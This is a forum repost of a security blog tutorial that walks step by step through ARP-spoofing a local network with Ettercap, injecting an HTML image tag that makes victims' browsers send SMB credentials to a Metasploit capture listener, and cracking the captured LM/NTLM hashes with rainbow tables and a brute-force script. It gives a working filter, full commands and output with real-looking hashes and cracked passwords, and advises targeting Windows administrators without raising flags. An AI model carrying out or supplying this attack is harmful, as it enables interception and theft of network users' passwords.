Jump to content
Nytro

Password Pwn Stew – Ettercap, Metasploit, Rcrack, HashCat, and Your Mom

Recommended Posts

Posted

You can probably get by with leaving off that last part of the title and still succeed with this attack. Today we will be making a Password Pwn Stew. Add a little Ettercap (link), with a dash of Metasploit (link), a smidgen of password cracking with Rcrack (link) and Rainbowtables (link), and if required a pinch of Hashcat (link) to taste. You will have yourself some tasty pwnage.

Note, your mileage may vary with this stew. I’m not Martha Stewart. Also the stew analogy ends here icon_smile.gif

The latest version of Kali Linux includes the most current version of Ettercap (0.8.0). But if you like installing from scratch then see Compiling and Installing Ettercap.

The latest version of Kali Linux includes the most current version of Metasploit. But if you like installing from scratch then visit the Metasploit Github page on setting up the development environment. You only need to follow the sections titled Apt-Get Install, Getting Ruby, Working with Git (ignore the forking part), Bundle install, and Configure your database.

The latest version of Kali Linux includes the most current version of rcracki_mt. You could also follow this quick tutorial to get rcracki_mt binary. You will also need to download the HALMLMCHALL rainbowtables so visit that same tutorial.

The latest version of Kali Linux includes an outdated version of HashCat. HashCat is free but not open source. You can download the latest binary from oclHashcat - advanced password recovery. You will need to download current video drivers for this version of HashCat. The following commands will work for Ubuntu 13.10 with an Nvidia card.

sudo add-apt-repository ppa:xorg-edgers/ppa

sudo apt-get update

sudo apt-get install nvidia-331 nvidia-settings-331

Now we have all our ingredients. Sorry, promised the analogy would end.

Let’s Get To It!

What we will accomplish is the Address Resolution Protocol (ARP) spoofing of a local network segment, inject HTML traffic whenever a user surfs the Internet/Intranet, and force clients to request a Server Message Block (SMB) authentication back to a Metasploit listener that will force authentication with a known challenge request. With a known challenge, and if LanManager is still enabled in the environment (Windows XP clients) then a Rainbowtable can be used to identify the first 7 characters of the password. The remainder can be brute forced. If only NTLM or NTLMv2 is used you still have a hash that you can dictionary attack or bruteforce, preferably with a cracker that takes advantage of your graphics card i.e. oclHashCat.

Setting Up Metasploit SMB Server

# service smbd stop

smbd stop/waiting

# /opt/metasploit-framework/msfconsole

msf > use auxiliary/server/capture/smb

msf auxiliary(smb) > set JOHNPWFILE /tmp/john

JOHNPWFILE => /tmp/john

msf auxiliary(smb) > run

[*] Auxiliary module execution completed

[*] Server started.

msf auxiliary(smb) >

ARP Spoofing and Packet Filtering with Ettercap

Note that when conducting ARP spoofing you will negatively impact the network traffic if you just spoof every host. Make your attack targeted so it does not raise any red flags or effect network performance. While this is outside the scope of this article you may want to target the workstations of any Windows Administrators to obtain their hash…for obvious reasons.

Before we start Ettercap we need to construct a filter to parse the HTTP (port 80) traffic and inject a link back to our Metasploit listener. There are links at the bottom to the resources I used to create the filter and learn about how filtering works in Ettercap.

Open your favorite text editor and paste the code below.

# vim http-img.filter

if (ip.proto == TCP && tcp.dst == 80) {

if (search(DATA.data, "Accept-Encoding")) {

replace("Accept-Encoding", "Accept-Rubbish!");

# note: replacement string is same length as original string

msg("zapped Accept-Encoding!\n");

}

}

if (ip.proto == TCP && tcp.src == 80) {

replace("<\/body", "<img src=\"\\\\<Metasploit_Listener_IP_Address>\\pixel.gif\"><\/body ");

msg("Filter Ran 4.\n");

Once the file is saved you will use an Ettercap command to convert the code into the binary Ettercap will understand. # etterfilter http-img.filter -o http-img.ef

etterfilter 0.8.0 copyright 2001-2013 Ettercap Development Team

12 protocol tables loaded:

DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth

11 constants loaded:

VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP

Parsing source file 'http-img.filter' done.

Unfolding the meta-tree done.

Converting labels to real offsets done.

Writing output to 'http-img.ef' done.

-> Script encoded into 15 instructions.

Copy the binary to the Ettercap share folder.

#copy http-img.ef /usr/share/ettercap

(may be /usr/local/share/ettercap) If you know your target you can start Ettercap from the command-line to begin sniffing, ARP Spoof, and filtering the traffic.

# ettercap -TqF http-img.ef -M arp:remote /<target_ip(s)>/ /<gatewayIP>/ -i eth0 If you prefer the GUI then follow the screenshots found here.

This screenshot shows Ettercap when the filter modifies the traffic. Below is an example capture of the SMB authentication in Metasploit

msf auxiliary(smb) >

[*] SMB Captured - Fri Jan 17 22:14:51 -0500 2014

NTLMv2 Response Captured from 192.168.0.108:1282 - 192.168.0.108

USER:Owner DOMAIN:COMPUTER-2554 OS:Windows 2002 Service Pack 3 2600 LM:Windows 2002 5.1

LMHASH:Disabled LM_CLIENT_CHALLENGE:Disabled

NTHASH:09af7e143207525cfc17e4037a1f0a54 NT_CLIENT_CHALLENGE:0101000000000000205e4972fb13cf01547f10c301861ef800000000020000000000000000000000

The last step we need to accomplish is crack the hash obtained. The example above has LMHASHing disabled. For demonstration purposes we will utilize LM and NTLM hashes captured during an actual penetration test.

One of the Metasploit options we set was JOHNPWFILE. This saves all hashes obtained in the format John the Ripper uses to crack passwords. It is also the format used by oclHashCat. But before we use any offline bruteforce tools we will demonstrate cracking NetLM using the example below. The username and domain have been removed to protect the guilty.

Username::WINDOWSDOMAIN:<b>1d006cfe2f3a9f72</b>ce4894c546c4beea53032ef5db28da08:b528f7d46e130e678c2e65a656b76b685f8dad9152d02c3f:1122334455667788 We will use rcracki_mt and the HALFLMCHALL rainbowtable to crack the first 7 characters of the password. This requires the first 16 digits of the NetLM hash – 1d006cfe2f3a9f72

# cd ~/tools/rcracki_mt_0.7.0_linux_x86_64

~/tools/rcracki_mt_0.7.0_linux_x86_64# # ./rcracki_mt /media/edge/3TB/Passwords/Rainbow/HalfLM/*.rti -h 1d006cfe2f3a9f72

Using 1 threads for pre-calculation and false alarm checking...

Found 4 rainbowtable files...

halflmchall_alpha-numeric#1-7_0_2400x57648865_1122334455667788_distrrtgen[p]_0.rti

reading index... 13528977 bytes read, disk access time: 0.00 s

reading table... 461190920 bytes read, disk access time: 0.00 s

searching for 1 hash...

plaintext of 1d006cfe2f3a9f72 is GOOSE00

cryptanalysis time: 0.06 s

statistics

-------------------------------------------------------

plaintext found: 1 of 1(100.00%)

total disk access time: 0.00s

total cryptanalysis time: 0.06s

total pre-calculation time: 2.34s

total chain walk step: 2876401

total false alarm: 31

total chain walk step due to false alarm: 68140

result

-------------------------------------------------------

1d006cfe2f3a9f72 GOOSE00 hex:474f4f53453030

Now to bruteforce the remaining portion of the password using a Ruby script that comes with Metasploit.

# cd /opt/metasploit-framework/tools

/opt/metasploit-framework/tools# ruby halflm_second.rb -n 1d006cfe2f3a9f72ce4894c546c4beea53032ef5db28da08 -p GOOSE00

[*] Trying one character...

[*] Trying two characters (eta: 12.858231544494629 seconds)...

[*] Cracked: GOOSE004#

Using the script to brute force up to 3 characters is about as far as you want to go with the halflm_second.rb script as you see in the example below. That is a ten character password which is not too shabby. As you see below a longer password will not be cracked in a reasonable amount of time. Especially if you are on a penetration test with a limited testing window.

Username2:WINDOWSDOMAIN:1c6e27fb87220408930041fca2d43260f3831c004b1486d8:eab0974cad5cf20ab14e0d264865973bbffc0e5ca4725e33:1122334455667788

/opt/metasploit-framework/tools# ruby halflm_second.rb -n 1c6e27fb87220408930041fca2d43260f3831c004b1486d8 -p RYANCHI

[*] Trying one character...

[*] Trying two characters (eta: 10.010079860687256 seconds)...

[*] Trying three characters (eta: 2292.3082880973816 seconds)...

[*] Trying four characters (eta: 524938.5979743004 seconds)... An eleven (11) character password will take 6.075 days. I have no idea how long a 12 character password would take but know that it is exponentially longer and not even scripted into halflm_second.rb . So oclHashcat and GPU password cracking to the rescue!

To continue the saga visit this tutorial on using Hashcat to bruteforce the second half of the password.

Great sites to learn about Ettercap Filtering

Fun with Ettercap Filters

"Invincibility lies in the defence; the possibility of victory in the attack" by Sun Tzu: More On Ettercap plus Filter examples

ETTERCAP - The Easy Tutorial - Man in the middle attacks

Sursa: Password Pwn Stew – Ettercap, Metasploit, Rcrack, HashCat, and Your Mom » jedge.com Information Security

  • Downvote 1

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...